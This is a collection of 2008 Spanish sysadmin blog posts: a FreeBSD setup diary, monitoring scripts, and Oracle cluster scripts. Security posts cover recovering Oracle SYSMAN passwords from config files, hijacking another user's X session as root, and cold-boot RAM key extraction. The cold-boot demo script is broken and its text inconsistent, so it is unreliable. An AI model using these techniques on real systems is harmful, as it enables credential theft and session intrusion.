xcmiscproto-1.1.2 - XCMisc extension headers
xf86bigfontproto-1.1.2 - XFree86-Bigfont extension headers
xorg-7.3_1 - X.Org complete distribution metaport
xorg-cf-files-1.0.2_2 - X.org cf files for use with imake builds

Pero esto es normal, yo no quiero jugar con esto. A desinstalar el paquete

[root@fbsd7 /usr/ports]# pwd
/usr/ports
[root@fbsd7 /usr/ports]# cd ports-mgmt/
[root@fbsd7 /usr/ports/ports-mgmt]# pkg_delete -f pkg_cutleaves-20080320

Vamos a hacer una vuelta atras, aunque lo desinstalemos despues

[root@fbsd7 ~]# find / -name pkg_cutleaves-20071021.tbz
/usr/ports/packages/All/pkg_cutleaves-20071021.tbz

parece ser que solo nos guarda un backup si no tenemos el archivo .tbz en local en /usr/ports/packages

Porque otros diferentes si los guardo:

[root@fbsd7 ~]# ls /usr/ports/packages/portmaster-backup/
bash-3.2.25.tbz libtool-1.5.24.tbz
gettext-0.16.1_3.tbz png-1.2.22.tbz
[root@fbsd7 ~]#

Mi primer dia con FreeBSD

2008-11-16T21:21:00.003+01:00

Hoy ha sido mi primer dia con FreeBSD, y ahora voy a pasar al blog las notas de mi libreta.

Sera muy esquematico, pero lo hago antes que para nadie para mi. De todas formas si tienes dudas en algo dejame un comentario y cuando pueda respondere. Pero ten en cuenta que aunque mi experiencia con UNIX es la mitad de mi vida, mi experiencia con FreeBSD es de 1 dia, pero total que.

Empecemos.

Bajar la ultima stable de FreeBSD. Solo quiero arrancar, descargare todo lo demas de inet. Minimal 7.0 ISO.

Keymap nada, yo tengo otra forma mejor de castellanizar FreeBSD.

All disk. Y aqui un comentario, no sigas esto al pie de la letra, esto ha sido con mis necesidades particulares. Yo quiero dedicar un HD de 80GB entero a FreeBSD, asi que All disk, que se cargue todo, me da igual.

FreeBSD bootmgr.

X-User.

Servidor rapido. Francia.

IPV6, DHCP. No.

Progreso instalacion Base + XOrg.

Solo instalo bash (quiero dar bash como shell por defecto a mi user personal), elinks (quiero navegar en consola en busca de info, y BitchX (quiero IRC for fun&profit).

GW. No.

inetd. No, si acaso usare xinetd luego.

ssh. Si, quiero logearme remotamente.

Anon FTP, NFS server. No.

NFS client. Vale, cliente si.

Customize console. A ver que hay aqui. Cosas inutiles por ahora, pero un momento, salvapantallas... Elijo el Saver Daemon que pone que es only text. Sera mas bonito que mi consola en negro.

TZ. Yes. UTC. No. Elijo zona horaria.

Linux bin compatibility. Yes

mouse. No de momento, el mio es USB de Sun.

Añadir user. Al grupo wheel (quiero poder hacer su) y shell bash (en FreeBSD esta en /usr/local/bin/bash)

Passwd root.

Reinicio y ya tengo una shell.

Esto parece que va bien. Backup del kernel:

cp -pR /boot/kernel /boot/kernel.1st

Añado mi hostname (en FQDN) a /etc/hosts (FreeBSD no me lo añadio) referenciado a 127.0.0.1

Vamos a por el raton. El mio es USB (auto obligatorio en FreeBSD). Dispositivo /dev/ums0. Tres botones. Edito /etc/rc.conf

usbd_enable="YES"
moused_flags="-3"
moused_port="/dev/ums0 /dev/sysmouse"
moused_type="auto"
moused_enable="YES"

Teclado e idioma en castellano. Quiero acentos y ñ:

Paso de keymaps, aunque FreeBSD me lo añada. Que lo añada, me da igual, yo a lo mio que es mejor.

Edito /etc/login.conf y creo una clase spanish con la localizacion, y ademas ligada al final a la clase default.

spanish|Spanish users:\
:charset=ISO8859-1:\
:lang=es_ES.ISO8859-1:\
:tc=default:

Esto no sirve de nada porque FreeBSD mira un archivo binario resultante de este. Reconstruyo la BD:

cap_mkdb /etc/login.conf

Pero al crear mi user personal, no lo añadi a ninguna clase, lo hago ahora a la clase spanish:

chclass vlan7

En class pongo spanish.

Yo reinicie para que login me aceptara los cambios, no me bastaba con cerrar e iniciar sesion. Y asi de paso podia comprobar que las cosas iban por buen camino. Y lo iban.

Vamos a por el escritorio. KDE.

pkg_add -r kde

Esto tarda, me voy a otro terminal y añado KDE como escritorio por defecto para mi user:

echo "startkde" >~.xinitrc

Ahora mi solucion para usar raton en consola _Y_ en las X.

chmod +s /usr/sbin/moused

Alguien me matara por ponerle bit SUID a esto... pero es mi solucion. Lee hasta el final y dime si tienes algujna mejor ;)

Edito /usr/local/bin/startx

Inicio:
vidcontrol -m off (desactivo puntero en consola)
moused -p /dev/sysmouse -t auto (solo asi funcionaba mi raton en las X -de ahi el SUID de antes, esto lo ejecuta vlan7-)
(...)
Final:
killall moused (como antes lo añadi yo, KDE no se entera y no me lo finaliza, tengo que matarlo yo. Tras esto, el moused de la consola permanece ¿por que? porque pertenece a root amigos, y vlan7 no tiene permisos para matar el proceso, asi que todo bien)
vidcontrol -m on (que aparezca el puntero en consola)

Pues eso, que si alguien tiene una solucion mejor: comentario al canto. Yo jugue con varias opciones, en una de ellas, al salir de KDE, el cursor en consola quedaba moviendose loco...

Quiero KDE en castellano. Paquete de idioma y teclado -eso dicen, bah- español. Idioma si eh.

pkg_add -r es-kde-i18n

startx y puedo poner KDE en castellano.

KDE no se entera de mi xorg.conf y me mantiene el teclado en ingles. No quiero abrir un terminal cada vez que entre y poner

setxkbmap -layout es -model pc105

(105 teclas para que admita la ñ)

Vaya, siempre se me dieron mal las ventanas. Aun recuerdo el panico a Win95 cuando salio... Pero buscando por KDE, puedo cambiar el teclado en el Centro de Control / Regional / Teclado

105 teclas (ñ)
Spain

Ya tengo todo. ¿Todo? No! Me falta mi navegador favorito desde el que os estoy escribiendo. Opera.

Como no me fio un pelo de los guiris, y quiero mi Opera en castellano, voy a la web de Opera y me bajo el tar.bz2 para FreeBSD 7, que los chicos de Opera dicen que es multilenguaje :)

Descomprimo.

./install.sh

Para el icono, arrastre opera.desktop al escritorio como enlace. Lo busque en algun lugar de /usr/local por *opera*

Y este es mi primer post desde un FreeBSD. Si yo he tardado un dia, cualquiera con conocimientos mas o menos solidos en otro(s) UNIX deberia poder.

Ahora, para mi, empieza lo bueno...

Suerte y Exitos.

Husmeando en archivos. Hacking Oracle. Passwords almacenados en archivos

2008-11-06T04:11:00.007+01:00

Haciendo pruebas tras una instalacion de Oracle 10g Release1 y Release2, y usando en *nix greps, awks, seds... en pipes buscando passwords almacenados en archivos, pude ver como el password de SYSMAN se almacena EN TEXTO PLANO en el archivo siguiente:

$ORACLE_HOME/hostname_sid/sysman/config/emoms.properties

En la version 10g Release 2, se usa DES para cifrar el password (madre mia, DES en 2008...). Aunque DES sea hoy en dia un algoritmo de cifrado muy debil, los chicos de Oracle nos ponen las cosas aun mas sencillas, pues el archivo emoms.properties contiene el mismo la clave de descifrado (sin comentarios), asi que un atacante aun puede de manera muy sencilla obtener el password. Simplemente fijate en las propiedades emdRepPwd y empRepPwdSeed e inserta sus valores en tu herramienta DES favorita y voila, ante ti tienes en un instante el password.

Otros lugares donde encontre informacion sensible fueron:

$ORACLE_HOME/cfgtoollogs/cfgfw/CfmLogger_install_date.log
$ORACLE_HOME/cfgtoollogs/cfgfw/oracle.assistants.server_install_date.log
$ORACLE_HOME/cfgtoollogs/configToolAllCommands
$ORACLE_HOME/inventory/Components21/oracle.assistants.server.10_2_0_1_0.CFM.1.inst.xml

Suerte,

Hardware hack. Convertir PIX 506E en casi 515E

2008-10-23T00:13:00.006+02:00

Leo en hack-a-day que basta sustituir la CPU. Abrirlo y meterle un P-III 600MHz. Y en los comentarios un tipo dice que consiguio meterle una imagen reciente del pixOS.
Os dejo el enlace mejor Upgrading the Cisco PIX 506E

Monitarizacion de varias maquinas remotas desde un win con VBS (CLD 3.1)

2008-10-09T18:39:00.012+02:00

Monitorizar pings, tnspings, URLs sin y con autenticacion. VBS


'CLD.VBS 3.1 (CheckListDiari 3.1)
'vlan7 - http://www.vlan7.org - From Scratch
'Ejecutar el script VBS en local si lo ejecutais varias personas (cuestion de permisos)

'News from 3.0 to 3.1 / 8-Oct-2008
'High Speedup
'Se quitan 2 Sleeps de 1 segundo porque se comprueba que no son necesarios.
'Por cada web_login 1 segundo de espera menos.

'News from 2.1 to 3.0 / 7-Oct-2008
'Monitorizacion de servicios de maquinas Win remotas
'2 WScript.Echo porque servicios tardan

'News from 2.0 to 2.1 / 1-Oct-2008
'Monitorizacion de conectividad de maquinas UNIX _desde ellas mismas_ con FTPs (plink)
'Me doy cuenta de la necesidad de ejecutar el script VBS en local

'News from 1.5 to 2.0 / 29-Ago-2008
'Monitorizacion servicios windows (aun solo local -comentado-)
'pings / tnspings totalmente rotos en 1.4. Solucionado
'Los ficheros se cierran
'Limpieza

'News from 1.4 to 1.5 / 28-Ago-2008
'Speed-up

'News from 1.3 to 1.4 / 27-Ago-2008
'Concurrencia de comandos obj WshShell (not True). Mucho mas rapido

'News from 1.2 to 1.3 / 16-Jul-2008
'Añadida comprobacion BBDD abiertas + startup_time sqlplus

'News from 1.1 to 1.2 / 12-Jun-2008
'Añadida comprobacion login en webs con Please Wait

'News from 1.0 to 1.1 / 11-Jun-2008
'Añadida comprobacion de que las webs estan up y corriendo
'Pequeñas mejoras de estilo

'1.0 / 6-Jun-2008
'Comprueba pings / tnspings

'Entradas:
'pings.txt - Maquinas a las que hacer ping
'tnspings.txt - Maquinas a las que hacer tnsping
'webs_no_login.txt - WEBs sin login a comprobar que esten up y corriendo
'webs_login.txt - WEBs con login a comprobar que esten up, corriendo y login OK
'services.txt - Servicios a monitorizar running y sus maquinas

'Formato entradas:
'pings.txt, tnspings.txt, webs_no_login.txt - Un host/IP/URL por linea
'webs_login.txt - 3 lineas: URL login, URL accesible solo logeado, patron a buscar
'bbdd.txt - 2 lineas: Un sqlplus, nombre bd a mostrar. (Se pasa bbdd.sql a sqlplus)
'services.txt - 2 lineas: host/IP;user;password, servicio1;servicio2;...;servicion

'Salida:
'Escribe en una hoja Excel on-the-fly:
'pings, tnspings, webs_no_login - Escribe Online / *OFF*
'webs_login - Escribe Online / *OFF* + Login OK / Login *NO* OK
'bbdd - Escribe select status, startup_time from v$instance;
'Orden: pings, tnspings, webs_no_login, webs_login, bbdd

Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = True
objExcel.Workbooks.Add

objExcel.Cells(1, 1).Value = "Maquinas"
objExcel.Cells(1, 2).Value = "Resultado"

Set Fso = CreateObject("Scripting.FileSystemObject")
Set WshShell = WScript.CreateObject("WScript.Shell")

Function EjecutaComando(Comando)
' Ejecuta comando argumento y devuelve salida comando
  Dim objExec, strOutput, intVersion

  On Error Resume Next
  intVersion = Wscript.Version ' Get scripting host version
  Set objExec = WshShell.Exec(Comando)

  If intVersion < 5.6 Then
    On Error Resume Next
    strOutput = objExec.StdOut.ReadAll
  Else
    Do While True    
      strOutput = strOutput & objExec.StdOut.Read(1)
      If objExec.StdOut.AtEndOfStream Then
        Exit Do
      End If
    Loop    
  End If    

  EjecutaComando = strOutput
End Function

i = 2 'Fila

' *** pings ***
Set InputFile = fso.OpenTextFile("pings.txt")
Do While Not (InputFile.atEndOfStream)
  HostName = InputFile.ReadLine
  strOutput = EjecutaComando("ping -n 1 " & HostName)
  objExcel.Cells(i, 1).Value = HostName

  patron = "Respuesta"
  objExcel.Cells(i, 2).Value = "*OFF*"
  
  arrLines = Split(strOutput, vbCrLf)
  For Each strLine in arrLines
    If InStr(strLine, patron) <> 0 Then 'Si patron encontrado
      objExcel.Cells(i, 2).Value = "On Line"
    End If
  Next

  i = i + 1 'Siguiente fila
Loop

InputFile.Close
i = i + 1 'Una linea en blanco

' *** tnspings ***
Set InputFile = fso.OpenTextFile("tnspings.txt")
Do While Not (InputFile.atEndOfStream)
  HostName = InputFile.ReadLine
  strOutput = EjecutaComando("tnsping " & HostName)
  objExcel.Cells(i, 1).Value = HostName

  patron = "correctamente"
  objExcel.Cells(i, 2).Value = "*OFF*"
  
  arrLines = Split(strOutput, vbCrLf)
  For Each strLine in arrLines
    If InStr(strLine, patron) <> 0 Then 'Si patron encontrado
      objExcel.Cells(i, 2).Value = "On Line"
    End If
  Next
  
  i = i + 1 'Siguiente fila
Loop

InputFile.Close
i = i + 1 'Una linea en blanco

' *** WEBs NO LOGIN***
Set InputFile = fso.OpenTextFile("webs_no_login.txt")
Set objHTTP = CreateObject("MSXML2.XMLHTTP") 
Do While Not (InputFile.atEndOfStream)
  URL = InputFile.ReadLine

  objExcel.Cells(i, 1).Value = URL

  'Comprobamos conectividad  

  objHTTP.Open "GET", URL, False
  objHttp.Send

  If objHTTP.statusText = "OK" Then
    objExcel.Cells(i, 2).Value = "On Line"
  End If
  
  objExcel.Cells(i, 3).Value = "No necesario login"
  
  i = i + 1 'Siguiente fila
Loop

InputFile.Close
i = i + 1 'Una linea en blanco

' *** WEBs LOGIN ***
Set InputFile = fso.OpenTextFile("webs_login.txt")
Do While Not (InputFile.atEndOfStream)
  URL = InputFile.ReadLine

  objExcel.Cells(i, 1).Value = URL

  'Comprobamos conectividad  
  objHTTP.Open "GET", url, False
  objHttp.Send

  If objHTTP.statusText = "OK" Then
    objExcel.Cells(i, 2).Value = "On Line"
    URL_login = InputFile.ReadLine 'URL test login
    patron = InputFile.Readline 'Cadena a buscar
    'WScript.Sleep 1000 'sleep de 1 segundo para que de tiempo a cargar pagina final

    'Comprobamos login  
    objHTTP.Open "GET", URL_login, False
    objHttp.Send
    objExcel.Cells(i, 3).Value = "Login *NO* OK"
    
    arrLines = Split(objHTTP.responseText, vbCrLf)
    For Each strLine in arrLines
      If InStr(strLine, patron) <> 0 then 'Si patron encontrado
        objExcel.Cells(i, 3).Value = "Login OK"
      end if
    Next
  End If
  i = i + 1 'Siguiente fila
Loop

i = i + 1 'Una linea en blanco

' *** BBDD ***
Set InputFile = fso.OpenTextFile("bbdd.txt")
Do While Not (InputFile.atEndOfStream)
  sqlplus = InputFile.ReadLine
  sistema = InputFile.ReadLine
  strOutput = EjecutaComando(sqlplus)
  objExcel.Cells(i, 1).Value = sistema
  patron = "OPEN"
  objExcel.Cells(i, 2).Value = "Closed"
  arrLines = Split(strOutput, vbCrLf)
  For Each strLine in arrLines
    If InStr(strLine, patron) <> 0 Then 'Si patron encontrado
      objExcel.Cells(i, 2).Value = strline '"Open"
    End If
  Next
  i = i + 1 'Siguiente fila
Loop

InputFile.Close
i = i + 1 'Una linea en blanco

' *** ftp_check.sh ***
objExcel.Cells(i, 1).Value = "remota"
i = i + 1 'Una linea en blanco
'%ComSpec% /c echo y |... necesario para pipear "yes" por si nos pide las claves ssh (la primera vez)
strOutput = EjecutaComando("%ComSpec% /c echo y |plink -ssh -pw password root@remota ""/bin/bash /ftp_check12.sh""")
arrLines = Split(strOutput, vbLf) 'UNIX solo usa caracter LF como nueva linea
For Each strLine in arrLines
  objExcel.Cells(i, 1).Value = strline
  i = i + 1 'Siguiente fila (siguiente FTP)
Next
'i = i + 1 'Una linea en blanco

WScript.Echo("Monitorizacion servicios Win remotos. Pulse 'Aceptar' y tenga paciencia")

' *** Servicios ***
Set InputFile = fso.OpenTextFile("services.txt")
Do While Not (InputFile.atEndOfStream)
  Linea = InputFile.ReadLine
  arrLines = Split(Linea, ";")
  strComputer = arrLines(0)
  Username = strComputer & "\" & arrLines(1)
  Password = arrLines(2)

  objExcel.Cells(i, 1).Value = strComputer
  
  Linea = InputFile.ReadLine
  arrServicios = Split(Linea, ";")

  'Creamos el objeto SWbemLocator
  Set objLocalizadorWMI = CreateObject("WbemScripting.SWbemLocator")
  Set objWMIService = objLocalizadorWMI.ConnectServer(strComputer, "root\cimv2", Username, Password)
 
  j = 0
  Do While j <= Ubound(arrServicios)
    strQuery = "SELECT DisplayName,State FROM Win32_Service WHERE Name = '" + arrServicios(j)
    strQuery = strQuery + "'"
    'i = i + 1 'Siguiente fila (Servicios) 
    'objExcel.Cells(i, 2).Value = strQuery
  
    Set colServices = objWMIService.ExecQuery(strQuery)
    For Each objService in colServices
      i = i + 1 'Siguiente fila (Servicio actual) 
      objExcel.Cells(i, 2).Value = objService.Name
      objExcel.Cells(i, 3).Value = objService.State
    Next
    j = j + 1
  Loop
  i = i + 1 'Siguiente fila (Siguiente Servicio) 
Loop
InputFile.Close

'Formato resaltado fila 1
objExcel.Range("A1:B1").Select
objExcel.Selection.Interior.ColorIndex = 19
objExcel.Selection.Font.ColorIndex = 11
objExcel.Selection.Font.Bold = True

'objExcel.Cells.EntireColumn.AutoFit
WScript.Echo("CLD finalizado. Pulse 'Aceptar' y revise la hoja Excel")

Capturar sesiones X de otros usuarios

2008-09-02T15:26:00.008+02:00

La autorizacion en las X-Window funciona basicamente de la siguiente manera:

El servidor X usa una "magic cookie" para autorizar usuarios. Cuando inicias sesion en las X, el servidor (X-Window es un servidor) crea y almacena esta cookie unica en ~/.Xauthority. El archivo solo es accesible por el propio usuario, y por el root claro.

Veamos como el root puede aprovecharse. Si nos logeamos como root en el servidor que vlan7 esta usando, podemos copiarnos la magic-cookie de vlan7.

# cp /home/vlan7/.Xauthority ~/

Pero antes de que podamos usarla tenemos que cambiar nuestro display. Como hemos entrado por ssh no tenemos display.

# echo $DISPLAY
DISPLAY: undefined variable

No queremos cualquier display, queremos justo el display que vlan7 esta usando. Lo averiguamos leyendo la magic-cookie de vlan7:

# xauth list
probador/unix:0 MIT-MAGIC-COOKIE-1 7e7b87943897439874392

Ya tenemos el nombre del display de vlan7. Es probador/unix:0, donde probador es su hostname. Nos conectamos a su display.

# DISPLAY=probador/unix:0
# export DISPLAY

Y ya podemos interactuar con su sesion. Por ejemplo, mandemosle un mensaje para que se vaya ya.

# xmessage -nearmouse Es hora de irse a casa vlan7...

Y cerca del raton le saldra el mensaje a vlan7. Hasta que no lo acepte no nos saldra de nuevo el prompt de la shell.

Sed buenos si sois root...

Control crontabs VCS con failover

2008-08-20T15:09:00.008+02:00

En un VCS con failover las tareas crontab solo deberian ejecutarse en el nodo activo.

Una solucion elegante es crear en todos los grupos del cluster un recurso de tipo FileOnOff que cree un archivo en /var/tmp solo donde el grupo esta activo. De tipo global y atributo critico a false para que no tire a todo el grupo si el recurso se cae.

De esta forma podemos comprobar en cada linea de los crontabs si ese archivo existe, y si y solo si existe, hacer lo que tengamos que hacer. Algo como:

0 3 * * * /bin/bash -c "if [ -f /var/tmp/cron ] ; then /export/home/oracle/bd_start.sh nombre_recurso; fi"

check FTPs bash (II)

2008-08-06T12:22:00.008+02:00

Nueva version del script que comprobaba la conectividad de FTPs definidos en un archivo de texto.

Hace lo mismo pero ahora manda mensaje al HP Openview si algun FTP falla.

Metido en una tarea crontab que se ejecuta cada 15 minutos.

Este es el codigo:

#ftp_check.sh 1.3 / 6-Ago-2008
#vlan7
#
#Based on GNUcitizen's bash portscanner
#
#News from 1.1 to 1.2
#Tratamiento background, si FTP NO OK, no necesario CTRL+C, kill.
#Mensaje a OVO si FTP NO OK
#
#News from 1.0 to 1.1 / 13-Jun-2008
#if-else en vez de 2 ifs, mas elegante
#
#1.0 / 12-Jun-2008
#Chequea status FTPs
#
#Requisitos: bash
#
#Entrada: ftps_ips.txt ftps_nombres.txt
#
#Salida: Escribe en salida estandar "FTP <host> OK" / "FTP <host> *NO* OK"
#
#Formato Entrada: Un server FTP por linea
#
#Nota: Para escanear otros puertos puede ser necesario mandar logout / exit en vez de quit
#
#!/bin/bash
for host in $(cat ftps_ips.txt) ; do
  echo -en "o $host 21\nquit\n" |telnet 2>/dev/null |grep 'Connected to' >/dev/null&
  sleep 1
  kill $! 2>/dev/null
  if [ $? -eq 0 ]; then
    /opt/OV/bin/opcmsg severity=critical app=kernel object=cron msg_text="Un FTP *NO* OK" msg_grp=Performance node=host.es
  fi
done

for host in $(cat ftps_nombres.txt) ; do
  if echo -en "o $host 21\nquit\n" |telnet 2>/dev/null |grep 'Connected to' >/dev/null; then
    : #NOP. returns 0
  else
    /opt/OV/bin/opcmsg severity=critical app=kernel object=cron msg_text="Un FTP *NO* OK" msg_grp=Performance node=host.es
  fi
done

Parada de una bd Oracle en VCS

2008-08-05T13:43:00.009+02:00

Teniendo en cuenta si el grupo esta o no congelado. Para el arranque es similar.

#bd_shut 2.0
#vlan7 / 5-8-2008
#Para la bd pasada como parametro $1 si la bd reside en mi nodo
#
#News from 1.1 (3-7-2008) to 2.0
#Valido para nodo congelado
#
#News from 1.0 (17-6-2008) to 1.1
#Full PATH comandos cluster
#
#Ejemplo llamada:
#./bd_shut.sh proves_oracle
#
#!/bin/bash

#Validacion contra cluster
/opt/VRTSvcs/bin/halogin admin password

#Abrimos config cluster
/opt/VRTSvcs/bin/haconf -makerw

#S1=Quien tiene la BBDD
S1=`/opt/VRTSvcs/bin/hares -state $1 |grep ONLINE |awk '{print $3}'`
S2=`hostname`

if [ "$S1" != "$S2" ];
then
  #A que grupo pertenece recurso $1
  grupo=`/opt/VRTSvcs/bin/hares -display $1 -attribute Group |grep Group |awk '{print $4}'`

  frozen=`/opt/VRTSvcs/bin/hagrp -display $grupo |grep -w Frozen |awk '{print $4}'`
  tfrozen=`/opt/VRTSvcs/bin/hagrp -display $grupo |grep -w TFrozen |awk '{print $4}'`

  #Si estamos frozen
  if [ "$tfrozen" -eq 1 ] || [ "$frozen" -eq 1 ]
  then
    #Descongelamos grupo
    /opt/VRTSvcs/bin/hagrp -unfreeze $grupo -sys $S1

    #Paramos bd
    /opt/VRTSvcs/bin/hares -offline $1 -sys $S1

    #Congelamos permanent
    /opt/VRTSvcs/bin/hagrp -freeze $grupo -persistent
  fi
fi

#Cerramos config cluster
/opt/VRTSvcs/bin/haconf -dump -makero

Monitorizacion Oracle

2008-07-29T08:51:00.007+02:00

oracle.bat:


@ECHO OFF
REM oracle.bat 1.3 / 11-6-2008
REM vlan7
REM News from 1.2 / 11-6-2008
REM -Pasada toda la cadena de tnsnames.ora a sqlplus. Ya funciona todo desde la red.
REM .
REM News from 1.1 / 10-6-2008
REM -Sobreescribir ">" en vez de append ">>"
REM -Eliminada una " que sobraba
REM -Testeado todo, OK
REM .
REM News from 1.0
REM -Todos los sqlplus en una linea con ORs (|)
REM -Los HTML resultantes se dejan en la ubicacion definitiva en red
REM -Se añade automaticamente fecha a los archivos para no tener que hacerlo a mano
REM -Testeado para un sqlplus OK

@FOR /F "tokens=1,2,3 delims=/ " %%A IN ('DATE /t') DO @( 
SET dia=%%A
SET mes=%%B
SET any=%%C
SET fecha=%%A-%%B-%%C
)
@ECHO ON

sqlplus -L -S -M "HTML ON TABLE 'BORDER="2"'" system/password@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=host)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=bd))) @"\\servidor\oracle\monitorizacion_bd.sql">"\\servidor2\host\monitorizacion_bd%fecha%.html" | sqlplus ...

monitorizacion_bd.sql:


-- MONITORITZACIO BBDD bd
SET PAGESIZE 500

TTITLE CENTER 'Verifico BBDD Oberta'
select status from v$instance;
TTITLE OFF;

--Verificació tamany BBDD
TTITLE CENTER 'Verifico tamany BBDD'
select sum(BYTES)/1024/1024 MB from DBA_EXTENTS;
TTITLE OFF;

--Verificació número d´obectes associats al propietari USRSI que tenen algun error descartant aquells que no són procedures ni package ni funcions
TTITLE CENTER 'Numero objectes del usuari USRSI amb errors deixant Package, Procedures y Functions.'
select count(*) from dba_objects where OWNER='USRSI' and STATUS <>'VALID' and not OBJECT_TYPE='PROCEDURE' and not OBJECT_TYPE='PACKAGE BODY'and not OBJECT_TYPE='FUNCTION';
TTITLE OFF;

--Si existeix algun objecte erroni miro quin és.
TTITLE CENTER 'Verificación objectes que donen error'
select * from dba_objects where OWNER='USRSI' and STATUS<>'VALID';
TTITLE OFF;

REM --Verificació d´indexs que són vàlids i estan danyats.
REM TTITLE CENTER 'Numero Indexs danyats'
REM select count(*) from dba_indexes where (table_owner like 'USRSI' and status <> 'VALID' and partitioned <> 'YES') or (partitioned='YES' and status <> 'N/A' and table_owner like 'USRSI');
REM TTITLE OFF;

REM --Verificació quins indexs que són vàlids i estan danyats.
REM TTITLE CENTER 'Nom Indexs danyats'
REM select status, partitioned, index_name  from dba_indexes where (table_owner like 'USRSI' and status <> 'VALID' and partitioned <> 'YES') or (partitioned='YES' and status <> 'N/A' and table_owner like 'USRSI');
REM TTITLE OFF;

--Revisió dels indexs que estan particionats
TTITLE CENTER 'Revisió de indexs particinats'
select index_name, status, index_type, table_name, uniqueness, tablespace_name, partitioned, last_analyzed from dba_indexes WHERE OWNER='USRSI';
TTITLE OFF;

--Verificació espai lliure i ocupat als tablespaces.
TTITLE CENTER 'Espai lliure i ocupat als tablespaces'
select a.tablespace_name "Nombre del tablespace",
to_char((sum(a.sumb) / sum(a.tots) * 100), '90.99') Porcentaje,
sum(a.tots) "Total Ocupado",
sum(a.sumb) "Total Libre"
from (select tablespace_name,
0 tots,
sum(bytes) sumb,
max(bytes) largest,
count(*) chunks
from dba_free_space a
group by tablespace_name
union
select tablespace_name, sum(bytes) tots, 0, 0, 0
from dba_data_files
group by tablespace_name
) a
group by a.tablespace_name order by porcentaje desc;
TTITLE OFF;

--Numero de blocks dels indexs que estan en estat UNUSABLE
TTITLE CENTER 'Numero de blocks que estan en estat UNUSABLE'
SELECT 'Número de indices particionados inactivos' , count(ip.partition_name) Indices FROM dba_ind_partitions ip, dba_part_indexes pi WHERE ip.index_name = pi.index_name AND ip.status = 'UNUSABLE' AND OWNER='USRSI';
TTITLE OFF;

--Revisió de blocks dels indexs que estan unasable
TTITLE CENTER 'Revisió de blocks dels indexos que estan unasable'
SELECT 'Número de indices particionadas en estado unusable' , pi.table_name , ip.partition_name  FROM dba_ind_partitions ip, dba_part_indexes pi WHERE ip.index_name = pi.index_name AND ip.status = 'UNUSABLE' AND OWNER='USRSI';
TTITLE OFF;

--Estat Tablespaces.
TTITLE CENTER 'Estat tablespaces'
select * from dba_tablespaces;
TTITLE OFF;

--Estat DataFiles.
TTITLE CENTER 'Estat DataFiles'
select * from dba_data_files;
TTITLE OFF;

-- Sessions obertes que porten més d´un dia connectades
TTITLE CENTER 'Sessions obertes que porten més d´un dia connectades'
select * from v$session where ((sysdate - (LOGON_TIME))>1) and (SCHEMANAME<>'SYS');
TTITLE OFF;

exit;

Habilitar SAR (Solaris <=9)

2008-07-28T10:31:00.006+02:00

Descomentar /etc/init.d/perf:

if [ -z "$_INIT_RUN_LEVEL" ]; then
set -- `/usr/bin/who -r`
_INIT_RUN_LEVEL="$7"
_INIT_RUN_NPREV="$8"
_INIT_PREV_LEVEL="$9"
fi

if [ $_INIT_RUN_LEVEL -ge 2 -a $_INIT_RUN_LEVEL -le 4 -a \
$_INIT_RUN_NPREV -eq 0 -a \( $_INIT_PREV_LEVEL = 1 -o \
$_INIT_PREV_LEVEL = S \) ]; then

/usr/bin/su sys -c "/usr/lib/sa/sadc /var/adm/sa/sa`date +%d`"
fi

Activar el crontab del sys:

0 * * * 0-6 /usr/lib/sa/sa1
20,40 8-17 * * 1-5 /usr/lib/sa/sa1
5 18 * * 1-5 /usr/lib/sa/sa2 -s 8:00 -e 18:01 -i 1200 -A

Y ejecutar el script:

/etc/init.d/perf

Recuperar datos de la RAM tras apagar el equipo

2008-07-24T19:11:00.006+02:00

En la entrada reciente titulada "Anti-Forensics", Anonimo me dejo un comentario que decia:

Creo que lo que hablas de la memoria es esto:

http://citp.princeton.edu/memory/

saludos
andoni

Yo no lo lei ahi, pero me ha dado por escribir sobre ello basandome (profundamente) en esa pagina.

La RAM almacena datos de lo que actualmente esta corriendo en el ordenador. Todo programa o proceso en ejecucion esta en la RAM. Otra cosa es que haya accesos a disco para recuperar informacion, pero todo lo que se esta ejecutando esta en la RAM.

(Casi) cualquier informatico, incluso expertos, te dirian que cuando apagas el ordenador, los datos que estaban en la RAM se pierden. Eso es falso. Los datos de la RAM van desapareciendo en un tiempo que oscila entre varios segundos y varios minutos, permitiendo el analisis forense de esos datos aunque se haya apagado el equipo.

Para aumentar este tiempo, podemos usar sprays de aire comprimido que enfrien la RAM a temperaturas cercanas a los -50ºC. Si el asunto es serio, puedes usar nitrogeno liquido hasta alcanzar cerca de los -200ºC para mantener en los chips la informacion durante HORAS.

Esto puede ser usado para capturar passwords almacenados en RAM, lo cual es muy frecuente que ocurra. Y tambien puede ser usado para violar utilidades de cifrado como Truecrypt, pues todas ellas se basan en almacenar las claves de descifrado en RAM. Esto se hizo asi porque lo creian seguro, pues el S.O. no deja a ningun programa acceder a estas claves en memoria, y en principio la unica manera de pasar del S.O. seria apagando el equipo, con lo cual todo el mundo sabe que las claves almacenadas en RAM desaparecerian. Todo el mundo menos los que como no sabian que era imposible, lo hicieron.

Pasemos a la accion.

Apagamos la maquina. Arrancamos con un S.O. desde nuestra llave USB por ejemplo, y copiamos el contenido de la memoria.

Haciendo esto habremos conseguido passwords almacenados en memoria, y claves de cifrado que podriamos usar para descifrar datos cifrados en disco.

Pero antes de pasar a la accion, esperemos un momento, demostremos todo esto.

UNIX. Crea un programa con un bucle infinito tal que asi:

#!/bin/bash
a = 'hola'
b = 'vlan7'
while [ 1 ]; do
c = '$a$b'
done

Pero antes de ejecutarlo, pasa todo el contenido de la memoria al disco.

sync

Ejecutalo ahora. No se mostrara nada, pero al cabo de un rato veras que el ordenador empieza a leer de disco, pues la RAM se ha llenado.

Bien, ahora dale al boton de reset, y, cuando la maquina arranque, busca risperdal en memoria:

# strings /dev/mem |less

Veras trozos de la cadena vlan7. Esa es la prueba de que datos de la RAM permanecieron tras el reset de la maquina.

Y ahora el ataque. Y como yo soy asi, solo dire que podeis encontrar herramientas recientes (16-Jul-2008) en http://citp.princeton.edu/memory/code/

Arranque, parada y exports de BBDD Oracle en VCS bajo Solaris 8

2008-07-24T15:07:00.009+02:00

Arranque:

#bd_start 1.1
#vlan7 / 3-7-2008
#Arranca la bd pasada como parametro $1 si la bd reside en mi nodo
#
#News from 1.0 (17-6-2008) to 1.1
#Full PATH comandos cluster
#
#Ejemplo llamada:
#./bd_start.sh grupo_bd
#
#!/bin/bash
